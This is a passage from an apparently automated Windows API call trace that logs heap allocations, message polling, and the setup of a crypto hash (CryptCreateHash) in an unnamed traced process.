lpMsg=0x8cf4a8) returned 0 [0180.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0180.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0180.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0180.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0180.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0180.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.331] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0180.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0180.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0180.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0180.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0180.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0180.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0180.333] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0180.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.333] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0180.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0180.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.334] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0180.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0180.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.334] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0180.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.334] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0180.348] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0180.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.349] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0180.349] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.349] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0180.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0180.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0180.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.350] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0180.350] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0180.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0180.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0180.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0180.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0180.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0180.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 